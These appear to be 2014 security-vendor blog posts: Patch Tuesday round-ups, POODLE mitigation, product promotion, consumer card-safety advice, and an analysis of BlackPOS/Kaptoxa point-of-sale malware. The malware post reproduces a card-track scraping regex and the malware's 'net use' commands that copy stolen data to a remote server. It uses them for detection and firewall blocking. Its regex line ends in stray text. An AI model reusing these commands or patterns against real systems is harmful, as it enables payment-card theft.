October Patch Tuesday Round-Up


Microsoft had a rough month.  Instead of the nine announced bulletins they released eight.  Of those eight, three updates were plugging vulnerabilities that were being exploited in the wild.  An additional Microsoft Security Advisory has caused some issues and was pulled from the downloads site.  On the Non-Microsoft front, there were releases from Adobe, Google, and Oracle that should be on your high priority list.  Oracle released their quarterly Critical Patch Update which included many high severity vulnerabilities in Java SE.  Adobe Flash released which also caused Internet Explorer and Google Chrome to release an update to support the plug-in.  Here is a priority breakdown for security updates this month and details on known issues:

Shavlik Priority 1 Updates (Priority 1 updates should be applied as soon as possible):

  • MS14-056: Cumulative Security Update for Internet Explorer (2987107) – This update is rated as Critical by Microsoft and resolves fourteen privately reported vulnerabilities in Internet Explorer which could lead to Remote Code Execution.  The vulnerabilities are all memory related exploits and the update is changing behavior of how IE handles objects in memory to resolve these vulnerabilities.  One of the vulnerabilities resolved (CVE-2014-4123) has been exploited in wild as a sandbox escape.
  • MS14-057: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (3000414) – This update is rated as Critical by Microsoft and resolves three privately reported vulnerabilities in .NET Framework which could lead to Remote Code Execution.   On .NET 4.0 iriParsing is disabled by default, but on .NET 4.5 this feature cannot be disabled.  If you are running .NET 4.5 this is a higher priority.
  • MS14-058:  Vulnerability in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) – This update resolves two privately reported vulnerabilities in Microsoft Windows which could lead to Remote Code Execution.  Both of the vulnerabilities (CVE-2014-4148 and CVE-2014-4113) in this bulletin have been reported in targeted attacks in the wild.  The vulnerabilities ideally could be used in concert, but the reported attacks were exploiting each in separate attacks.
  • MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) – This update is rated as Important and resolves one privately reported vulnerability in Microsoft Windows.  Although only rated as Important, this update resolves a vulnerability (CVE-2014-4114) that has been detected in targeted attacks reported in the wild.
  • APSB14-22: Security updates available for Adobe Flash Player – This update is rated as a Priority 1 by Adobe and resolves three vulnerabilities in Adobe Flash Player.  Two of the vulnerabilities are memory corruption issues and the third is a integer overflow which could lead to Code Execution.  In addition to the Flash Player update there is an IE Security Advisory and a Google Chrome update that need to be deployed to resolve the vulnerabilities in the Flash browser plug-in.
  • MSAF-031: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer – This advisory updates Internet Explorer to support the latest Adobe Flash Player Plug-In update.  The Flash Player update is a Priority 1 update resolving three vulnerabilities.
  • CHROME-114: Chrome 38.0.2125.104 – This is a High priority update from Google to update the Adobe Flash Player Plug-In. The Flash Player update is a Priority 1 update resolving three vulnerabilities.
  • Java7-71: Java 7 Update 71 – This update is part of the Oracle Critical Patch Update release for Q4.  The release resolves 25 vulnerabilities, 22 of which are exploitable over the network without authentication.  Oracle has rated this update as Critical.  It includes one vulnerability with a CVSS score of 10.0 and several other 9′s.

Shavlik Priority 2 Updates (Priority 2 updates should be tested and rolled out in a reasonable time frame, typically within 10-30 days of release):

  • MS14-059: Vulnerability in ASP.NET MVC Could Allow Security Feature Bypass (2990942) – This update resolves one publicly disclosed vulnerability and is rated as Important.  The vulnerability is mitigated by XSS filters in IE 8, 9, 10, and 11 and workarounds are available to block ActiveX controls for Local Intranet Security Zones.  A user would need to be convinced to view a specially crafted website or click a link in a email message or Instant Messenger message to be exploited.
  • MS14-061: Vulnerability in Microsoft Word and Office Web Apps Could Allow Remote Code Execution (3000434) – This update resolves one privately reported vulnerability and is rated as Important.  An attacker must convince a user to open an attachment or access a specially crafted website.  If exploited the attacker would gain the same user rights as the current user.  Limiting users to less than Administrator user rights can mitigate the exposure if exploited.
  • MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) – This update resolves a publicly disclosed vulnerability in Microsoft Windows and is rated as Important.  The vulnerability is part of the Message Queuing component which is not installed by default.  It must be enabled by a user with Administrator privileges.  An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.

Shavlik Priority 3 Updates (Priority 3 updates should be evaluated to determine potential risk to the environment and tested and rolled out in a reasonable time frame if applicable):

  • MS14-063: Vulnerability in FAT32 Disk Partition Driver Could Allow Elevation of Privilege (2998579) – This update resolves one privately reported vulnerability in Microsoft Windows which could lead to Elevation of Privilege.  The attacker must have physical access to the system to be able to exploit the vulnerability.
  • FF14-012: Firefox 33.0 - Mozilla released FireFox 33.  This update does not include security fixes, just new features and bug fixes.

Watch List:

  • MS14-A12: Security Advisory KB 2949927: Availability of SHA-2 Hashing Algorithm for Windows 7 and Windows Server 2008 R2 – The update has been pulled due to issues impacting systems after update.  Some have had to be restored by CD-rom to resolve.  If you have already deployed this Advisory you may need to roll it back.   

For access to Shavlik’s Patch Tuesday webinar or presentation you can go to our webinars page and check out the ‘Recent Webinars’ section and click view. You can also sign up for the October Patch Tuesday webinar where we will discuss the Patch Tuesday release for all of the critical apps that affect you.



No POODLES Allowed! How to Avoid the POODLE Vulnerability


Ever wonder why poodles seem so evil? Maybe it is because of the pretentious hair cuts and pink bows. I suppose I would have a mean disposition if someone dressed me up like that every day. Whether you are a fan of the breed or not, I think we can all agree that POODLE is something that none of us would allow. I am referring to the recently discovered SSL 3.0 vulnerability called POODLE (Padding Oracle On Downgraded Legacy Encryption).

This dog may have teeth and a unfriendly disposition, but it might have more bark than bite.

The issue is at a protocol level, taking advantage of how SSL 3.0 encrypts using CBC mode ciphersuites. I am not a crypto expert, but here is a interesting write-up that explains it in terms that even my rudimentary crypto knowledge can grasp. The solution? Do not allow POODLE. Or more importantly do-not-allow SSL 3.0.  This recommendation is already cropping up from vendors and security experts. SSL 3.0 is old and outdated (18+ years). Many vendors and security experts are calling for the end of SSL 3.0 and a couple of your favorite browsers are taking steps in the near future to make this a reality. See posts from both Mozilla and Google hinting at near term removal of SSL 3.0 support from the popular FireFox and Chrome browsers.


You can start taking steps to remove this threat from your environment and remove the threat from your highest risk users, those who leave the network and do crazy things like connect up to free wi-fi at the airport, coffee shop, etc. Those are the users who are going to be most at risk.

There are a number of vendors starting to respond to how this can be locked down and all are pretty similar. Disable SSL 3.0 on the servers and at the browser. Either client or server disabling this will not allow the downgrade attack to occur (connection tries to negotiate a TLS connection, but is downgraded deliberately to SSL 3.0 so it can be exploited). If either end would not allow the SSL 3.0 protocol the attack would not be successful.

Here are some helpful links from some of the large vendors out there. The difficulties will come in for appliances and other devices that do not give much for configuration options.

Microsoft Advisory 3009008 or this KB to disable SSL 3.0 in IIS

Apple has not been too helpful based on the response seen in this community post. Talk to your internet provider? Really?

YouWouldBeTooIfYouHadHairLikeThisThe guidance to our customers is disable SSL 3.0 to take the teeth out of this POODLE. The GPO from Microsoft and the registry key in the KB article will allow you to disable SSL 3.0 on your clients and your servers. This should do two things. For the clients you remove the threat of one of your users getting on an unprotected Wi-Fi and being exposed while connecting to a web service that allows SSL 3.0. For your servers, you are removing the threat for them being the weak link if your customers\clients are connecting from unprotected Wi-Fi. If both ends of the connection disables SSL 3.0, you have effectively removed the threat.



Patch Tuesday Advanced Notification October 2014

Bunker Blog

Microsoft has announced 9 bulletins for October 2014, three of which are rated as Critical.  Just a reminder that back in August Microsoft put a hard deadline on implementing the Update 1 (KB2919355) for Windows 8.1 and Server 2012 R2, making it so users need to install Update 1 in order to keep their systems updated.

The first bulletin is a Critical update for Internet Explorer.  There is a strong likelihood it will resolve a number of vulnerabilities in the double digits.  Since June we have seen a trend of double digit vulnerabilities regarding Memory Corruption issues in IE.  Expect this to be a high priority to be rolled out ASAP.

The second and third bulletins are also Critical and affect the Windows Operating System and .Net Framework.  Both could allow for remote code execution.

Bulletins four and six affect Microsoft Office.  One is listed as Moderate and one as Important.  Bulletin six also pertains to SharePoint and Office Web Apps.  For Office these patches will likely fall into the test adequately and roll-out in a timely manner category.  The SharePoint and Office Web Apps updates will require adequate testing before rolling out.

On top of what looks to be a large Patch Day from Microsoft we will also see Oracle’s quarterly Critical Patch Update next week.  Expect an update for Java that will include a large number of fixes and likely will have some urgency to roll-out.

Adobe is on a solid trend of releasing a Flash update on Patch Tuesday.  So far in 2014 there have been Critical updates to Flash every month.  All but one month have fallen on Patch Tuesday.  Expect Flash and expect it to be a priority.  If that releases we will see an IE Advisory to support the Plug-In update.

Also on the Adobe front, a number of issues have been reported on Acrobat Reader 11.0.9.  There is a chance for an update to resolve those issues.  If you have updated to 11.0.9 watch for this.

Google Chrome just had a rather large release so chances are either from a potential Flash update (to support the Flash Plug-In) or other issues that may occur we could likely see a Google Chrome update.

Microsoft Security Bulletins:

  • 3 bulletins are rated as Critical.
  • 1 bulletin is rated as Moderate
  • 5 bulletins are rated as Important

Vulnerability Impact:

  • 5 bulletins address vulnerabilities which could allow Remote Code Execution.
  • 1 bulletin addresses vulnerabilities which could result in Security Feature Bypass.
  • 3 bulletins address vulnerabilities which could allow Elevation of Privileges.

Affected Products:

  • All supported Windows Operating Systems.
  • All supported Internet Explorer versions.
  • Microsoft .Net Framework
  • Microsoft Office 2007 and 2010
  • Microsoft SharePoint Server 2010
  • Microsoft Office Web Apps 2010
  • ASP.Net MVC


Join us as we review the Microsoft and third-party releases for October Patch Tuesday in our next monthly Patch Tuesday webcast, which is scheduled for Wednesday, October 15th at 11 a.m. CDT.  We will also discuss other product and patch releases since the September Patch Tuesday.

You can register for the Patch Tuesday webinar here.

Why Break SCCM Just To Add Functionality?

WhybreakSCCMLast week, I had the opportunity to attend the Atlanta Systems Management User Group (atlsmug).  It had some great discussion as well as some really good presentations. One that stuck out to me was Joe Crawford’s presentation titled “Notes from the Field: Why Pull DPs Are Like Pulling Teeth.” He went into some good details about how to leverage the Microsoft System Center Configuration Manager (SCCM) client to pull software packages to distribution points.

The presentation got me thinking. It seems that SCCM admins work hard to make sure they can get what they need from SCCM. It needs to be configured and customized for their environments, which is not all that easy. With large organizations and complex networks, getting SCCM to work properly just to distribute software and updates can be a real challenge.

My interaction with SCCM users shows that many of them did not setup the initial install. This means, that because of the complexity of getting their implementation from the beginning, that one of two things happened: they hired a contractor, or they used the server team to get it going.

So why break all of that? Many SCCM add-on products claim to plug into SCCM, but drag with it additional processes, consoles, and infrastructure based on light integration from an existing vendor’s software. They simply have some type of integration point (push or pull data) with SCCM, but are not truly integrated.

Shavlik surveyed SCCM users to determine that over 68 percent of those surveyed preferred a completely integrated tool. (Raise hand, turn palm toward forehead, slap). It seems that this is a no brainer, but somehow many software vendors still create tools that add additional functionality but require you to use their proprietary distribution tools. If you ‘ve already built your implementation of SCCM to handle all your network segments, remote locations and even remote workers, why get a solution that requires you to install that all again?

One of the most important functions of SCCM is patch management, and many organizations use it to patch server and client systems but just for the OS or Microsoft applications. With 86 percent of vulnerabilities coming from software outside of the OS and with all the news of retail, healthcare, and now financial security breaches, it’s becoming even more important to patch all of your systems.

Shavlik has provided Shavlik Patch for Microsoft System Centers. Take a look at how we were able to provide you a simple and intuitive add-on for SCCM for third-party application patching. At the Atlanta user group meeting, John Rush did a great job of showing how easy it was to add third-party patching to SCCM without additional infrastructure.

The Communicator’s Corner: Database Maintenance Tool– The Importance of Keeping Your Tools Running at Peak Efficiency

DatabaseMaintenanceToolI have a 1997 Acura Integra that I have owned for over 16 years. I am often asked why I still drive such an old car and my answer is always the same: the car is still running great, it gets great gas mileage (34 mpg!), it is still in relatively good condition, so why get rid of it? Now, I am not a gear-head and truth be told I know very little about the mechanical workings of a car. But what I do know is basic maintenance. I am very conscientious about doing the little things that keep the car going, including changing the oil myself on a regular basis. I am convinced that it is the basic maintenance that I do on a consistent basis that keeps this car humming at peak efficiency.

Did you know that you should also perform basic maintenance on Shavlik Protect in order to keep it operating at peak efficiency? It’s true, and we provide you with several tools to do just that. In this blog article I’d like to introduce you to one of those tools, the Database Maintenance tool.

Over time, the SQL database you use with Shavlik Protect can grow quite large and can get bogged down with old data. It is important to perform periodic maintenance on your database so that, like my trusty old car, it continues to hum along at peak efficiency. To help with this, Shavlik provides you with a Database Maintenance tool. It is available from the Shavlik Protect Tools > Operations menu and its purpose is to help you perform maintenance tasks on your SQL database.

Some of the tasks that the Database Maintenance tool enables you to perform are:

  • Delete old scan results that are no longer needed
  • Set limits on the number of scan results to store in the database
  • Rebuild the database indexes after old data is removed
  • Create backup copies of the database and the transaction log

And to make life easier for you, you can create a scheduled job that performs the database maintenance tasks on a regularly scheduled basis. (Refer to my previous blog article, Automated Patching for Busy People, for the importance of simplifying life by using automated tasks.)

Nice, huh?! Interested in learning more? I hope so! You can find out everything you need to know about the Database Maintenance tool in the Shavlik Protect Help system available here: http://help.shavlik.com/Protect/onlinehelp/91/ENU/PRT.htm

PAC Helps Drive the Future of Shavlik Products

Last week, the Shavlik Product Advisory Council (PAC) met for a two-day, onsite meeting at the Shavlik office in Minneapolis.

During this event, PAC members learned more about Shavlik’s strategy and roadmap, reviewed and also test-drove Shavlik Protect 9.2, and most importantly, provided insight and guidance on Shavlik’s product direction.

Thanks to all PAC members for your participation in this event!

In the photos below, (top) PAC members discussed upcoming features in Protect 9.2; (middle) A PAC member shares his idea for an ideal security dashboard; (bottom) It wasn’t all work as PAC members and members of the Shavlik team take in a rare Twins win at Target Field.






The Communicator’s Corner: Automated Patching for Busy People

We all know by now how important it is to patch our computers to keep bad things from happening. We also know that most IT administrators are extremely busy and don’t have the time, or inclination, to devote themselves to this admittedly mundane, but critical, task. So what’s the answer? Automation.

Automation is the perfect solution for performing what would otherwise be a tedious task. Take for example the latest trend with retirement plans. Until recently, if an employee wanted to participate in the company retirement plan, they were forced to work through a mountain of paperwork on their own, and all too often people just gave up. So, many companies have decided to move away from the “opt in” approach and are instead offering automatic enrollment plans. It is human nature to take the path of least resistance, so by automating the desired path and forcing employees to manually opt out, rather than opt in, HR folks have noticed a much higher rate of participation in retirement plans. (Yea!)

The same principal holds true when it comes to implementing your patch process; it is much more likely to happen if it is automated. So is there a tool that provides automated patching and that secures your computers almost without thinking? Yes, and it is called Shavlik Protect.

How to automate your patching process using scheduled scans and deployments

The Shavlik Protect interface makes it extremely easy to set up scheduled patch scans and deployments on the machines in your organization.  Using a few basic features, (such as machine groups, scan templates, and deployment templates) you can easily configure Shavlik Protect to automatically perform recurring scheduled scans and to automatically deploy any missing patches that it detects during a scan. Doing so creates a completely automated patch scan and deployment operation.

Want to know how it is done? This screenshot probably tells you most of what you need to know.

Automated Patching for Busy People






But if you are like me, and you like to know all the details, check out our video on how to automate scheduled patching. You can find it here: http://www.shavlik.com/support/training-videos/protect/.

Unattended Consoles

Let’s take things one step further. First, a lead-in: If you happen to work in an organization with many office sites located across the country or around the world, you might be (you should be!) using multiple Shavlik Protect consoles. You can set things up so that the machines at a central site (probably your company headquarters) are managed by a central console, while the machines at your remote sites are managed by remote consoles. The data rollup feature can then be used so that the central console receives data about the machines being managed by the remote consoles.

With the stage now set, wouldn’t it be nice not to have to worry about any ongoing administration tasks at your remote consoles?  Well, once again, with Shavlik Protect you can! You can automate the system by implementing an unattended console at each remote site. An unattended console is a console you set up once. After that the console automatically updates its own files and manages its machines without human assistance.

Here’s how it works: The unattended console is configured to automatically perform periodic scans and to automatically deploy any patches it detects as missing on its target machines (see above). The console will also contain a patch scan template that is defined to look for a particular set of patches. The set of patches is contained in a patch list that resides on a distribution server. (Distribution servers were discussed in a previous blog article.)

Now, when new patches are released by a vendor (for example, the monthly patches released by Microsoft Corporation), you simply update the patch list on the distribution server. When the unattended console performs its next scheduled scan it will automatically reference the updated list and will patch its target machines, all without human intervention.

The following figure illustrates an unattended console configuration.

Automated Patching for Busy People 2


Rollup console


Managed machines


Unattended console


Distribution server


Patch list


Patch Management Automation: Turning a Weakness Into a Strength

PatchWithoutBorderOne of the single greatest challenges that IT professionals face today is the arduous task of keeping up with the constant bombardment of new vulnerabilities. According to the folks at NIST (the National Institute of Standards and Technology), in 2013 the total number of new vulnerabilities that were identified eclipsed 5,186. http://web.nvd.nist.gov/view/vuln/statistics-results?cves=on

That breaks down to 14 new vulnerabilities a day; which, without the appropriate level of patch management, makes the challenge of managing this situation almost insurmountable!  With the continuous flow of new software technology, and the constantly changing network landscape (physical, virtual and mobile…), the challenges associated with Patch Management will continue.

There is hope! The challenges associated with Patch Management will continue to persist, but by injecting the proper level of automation into mix, what was once an unmanageable issue can be easily contained. So…if you’re reading this post, and the situation I just described sounds familiar, there is a solution.

If you’re not able to keep up with the challenges associated with patch management, you should consider introducing technology that will automate this process for you, saving both time and money. Most importantly, it will help remove what today is an unknown level of risk which can provide peace of mind, and let you move on to address more pressing and important priorities. To learn more about what you can do to address the ongoing challenges associated with patch management and patch management automation, visit: http://www.shavlik.com/solutions/

Consumers Beware: Protect Yourselves from Security Breaches

ProtectionIn this blog series on security breaches, we’ve talked a lot about what retailers can do to secure their IT infrastructures and to protect customer data. However, in today’s environment, it is impossible for any company, not to a mention a retailer, to be 100% secure. The question isn’t IF your favorite store will get hacked; the question is WHEN your favorite store will get hacked.

Given this reality, let’s turn our attention to what we as consumers can do to protect ourselves. Following three basic practices will limit your risk of exposure to nearly zero, and means you can continue blissfully shopping at all of your favorite stores, regardless of whether or not you’ve seen their name in the paper recently.

#1 – Ditch the debit cards

As I was first venturing into the adult world, one piece of financial advice my dad gave me was, “Debit cards are evil.” It was the late ‘90s, so data breaches and BlackPOS weren’t top of mind. Heck, e-commerce was just kicking off then. He was thinking about old school things like earning interest in your checking account, earning cash back from credit cards, and the risk of the card being lost or stolen.

Fast forward to today’s environment and Dad’s advice is better than ever. If a debit card number is compromised, your checking account can be emptied and your money inaccessible while you go through what can be a lengthy process of disputing the charge. With credit cards, on the other hand, you are not obligated to make payments that are under dispute, so the disputed funds stay with you. In reality your only risk from a compromised credit card number is the inconvenience of having to update auto-payments if your credit card company issues a new number. That is if you do #2…

#2 – Review your statements carefully

We as consumers do have an obligation to review our credit card statements each month and to promptly report any erroneous charges. In doing so, be especially mindful of small charges, say for like $0.05, that might be testing the viability of your card number. That type of charge is an early indicator that your credit card number has fallen into the hands of evil, so don’t let the size of the charge keep you from reporting it.

By carefully reviewing your credit card statement each month and reporting any charges that don’t seem right, you shift the responsibility for unauthorized charges from yourself to your credit card company.

#3 – Don’t stress out about the headlines

Working for a security software company, I get questioned a lot about retail security breaches by friends and family. When Target came under fire last fall, a lot of folks asked if I was going to stop shopping there and if they should stop too. The thought of not shopping at Target had never crossed my mind. Shoot, I live in Minnesota; I’d give up hockey before giving up Target.

Seriously, though, if you’ve followed the steps above, there’s little if any effect on you if your credit card info is compromised. You don’t need to stop shopping at a store because you see its name in the paper. Swipe away and leave the worry to your favorite retailer’s IT department.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now



Retailers Beware: a Swipe of the Credit Card Could Swipe your Data

176217552 In the past year, we’ve heard about numerous major retailers getting hit by a series of different variants of malware designed to swipe their customers’ credit card information.  Last week, I sat down with Anne Steiner and captured some of our thoughts on this matter. Today, I’m going to take that Q&A session we had down a level to where we discuss the technology that is causing this wave of cyber-theft.

To begin with, let’s discuss the attacks. In years past, you would typically hear about companies who leaked information from a central point. A great example is that hackers would try and infiltrate a network and then go after servers that they could tell housed critical databases that contained customer information. After taking control of that system, through whatever various means they used, they’d then use various mechanisms of exfiltration to take that data and send it offsite all in one fell swoop.

The challenge with these types of attacks is that cyber-security has advanced through the years to make this more difficult. IT Administrators first identify their “primary targets” on networks where data is stored. Then, they create various levels of security to prevent that data from being accessed from nodes that shouldn’t have access to it, while also putting IP-security around it to make sure that if the data was compromised it couldn’t freely flow off the server into the wrong hands. The quick gist, though, is it is increasingly difficult for hackers to find servers that are vulnerable and then exploit them without detection.

The challenge with the most recent wave of attacks is that the hacking community has realized that these attacks are difficult and once again the law of governing dynamics for cyber-warfare has taken over. That law specifically stating:

1)  Attacks will trend towards the most vulnerable machines on a network.

2)  Attacks will trend towards the most vulnerable software on a network.

3)  Attacks will trend towards the most valuable data on a network.

In the above, this has forced a change in the way in which hackers go about exploiting vulnerabilities and how they get data off of a network.


Fast-forward to current day where cyber security is a challenge. We have already discussed that most of your server administrators are securing servers with Patch and various levels of anti-malware detection. The challenge is that the same security perimeter does not exist at most of the user endpoints on a network. In general, most of those endpoints don’t contain highly valuable data, unless you have specific knowledge of who you are hacking. In the retail sector though, you know that there are cash-register terminals (Point of Sale systems) out there that are handling the transactions with customers and these nodes get interesting. In general, they are Microsoft Windows nodes running Point of Sale Software and they are collecting credit-cards at a rate of over 97% of consumer transactions. This is where things get interesting for hackers.

Let me give you a non-technical description of the problem for a moment. Imagine I was a thief breaking into your home. I need to target you, but realistically, I don’t know who lives there and I just kind of brute force my way in. When I get inside, I start looking around for valuable stuff to steal. Maybe I see some good stuff, but for the really valuable stuff like jewelry, credit cards, money, or even electronics, I need to dig around a bit. It takes a while, right? In the case of retail, imagine the scenario is different… I want credit cards; I know they are generally at the point of sale systems, and I know where those are located in the store. I can get in, look for exactly what I want, and then get out.

This is the power of knowing your target and what you want to steal; you can get far more specific, and that’s what is fueling all of these attacks.

We’re going to take a step back for a moment and dissect a specific malware threat known as BlackPOS or Kaptoxa. This malware is specifically designed to run on Point of Sale systems, and it is further designed in a two-step process to steal the data without detection. We’ll talk about its approach and then how to protect yourself from it.


First off, Kaptoxa has to make it onto your network. In general, the most direct approach for this to happen is an unsecure or unpatched machine, where hackers are able to gain access to your network with some sort of elevated privileges. After they get onto the network, they begin to spread Kaptoxa around via a number of freely available scripts on the internet that identify the Point-Of-Sale (POS) systems and then infect them.

After infection, Kaptoxa begins to operate with two different processes. The first process attaches itself to the POS application and begins to look for credit card information, and the latter process runs periodically and starts up to offload the captured information to external servers.

For the first process, Kaptoxa does something so simple and effective it’s scary. It grabs the POS execution process and just identifies its memory. During normal operation of the program, it’ll read some credit card information in from a credit card swipe reader.  This data is in an incredibly uniform pattern that resembles something like this:


However, this is the problem! The data is so uniform, if I can attach myself to a process and look at its memory, at some point, a credit card track will be visible to me just by scanning the memory and looking for a pattern like that. While that sounds tough, a rough scrape of that information can easily be done in a simple grep command with a parameter that looks like this:

(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))e that.

So, now that Kaptoxa knows what data it is looking for, where to find it, and how to extract it from memory, the last bit it’ll do is store it somewhere on the hard drive so it can pick it up later. In some of the early variants, it placed it right into the Windows System directory in a falsely named DLL file and just stored it in plain text.

With the main process running, Kaptoxa is constantly looking for more data to exploit and dropping it into a directory for it to be sent off later. That file will just continue to grow over time. The role of that second process is to wake up occasionally and extract the data offsite. The Kaptoxa process is again simplistic in it approach to date, using some basic mechanisms of internet file share mapping via SMB/CIFS to connect an internet drive on a remote server that is setup for open sharing, then it copies the file and removes the share. While the approach has been different by variant, the command syntax for execution will look something like:

net use L: \<[X.X.X.X]>c$WINDOWStwain_32 /user:<[User]> <[Password]>

move <Windows>system32winxml.dll S:<[Machine Name]><[Day]><[Month]><[Hour]>.txt

net use L: /del

The script above connects a drive mapping called “L:” to a remote server, moves the file and then deletes the file share after it is done. A quick execution of this process later and the file is gone and your data has been extracted.


First off, I’d be remised if I didn’t remind you that the malware compromised your network through a security flaw. If the systems had been protected, it wouldn’t have been compromised in the first place. The one thing to mention here is don’t just protect your servers, but your workstations need to be patched and managed too to prevent this. At the same time, if it already happened, you want to be prepared too.

In all the variants we’ve seen so far, there are two ways to protect yourself that target a specific aspect of the malware. Let’s start with the process/memory thread. In that case, the simplest way to make sure you aren’t vulnerable is to make sure you don’t have your data on your POS hard-drive or registry. There is a very simple way to take the regular expression that I listed above, and put it into a PowerShell script that scans your windows files and finds the same signature that Kaptoxa is looking for. If you find it on your hard-drive, I promise you, if you are PCI compliant, it shouldn’t be there. You’re infected and should take immediate measures to shut down the remote nodes while you do clean-up on the malware.

The second prevention method is more of a network approach, but barring specific reasons, there shouldn’t be a reason why one of your POS systems should be attaching a network drive to an off-company IP address. To put a hard stop on this, a brute-force deny rule can be added to your firewall alerts using the general alert format of:

Block: TCP

Port: 445

From: Internal

To: External IP

If you are looking for a less-invasive rule, I’d suggest country filters for this SMB/CIFS traffic.


So, let me just say this blog isn’t just for Retail. What started as swiping swipes is proliferating into variants that haven’t been successful yet but are beginning to come together to steal banking data, financial records, health insurance/patient information and other types of structured data. We can expect this threat to evolve rapidly in 2014/2015, and everyone should implement best practices to:

1)  Prevent threats from getting on their network by protecting Servers AND WORKSTATIONS with patching and anti-malware technologies

2)  Prevent data theft from implementing more specific rules on key areas and equipment on their network to prevent data exfiltration.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now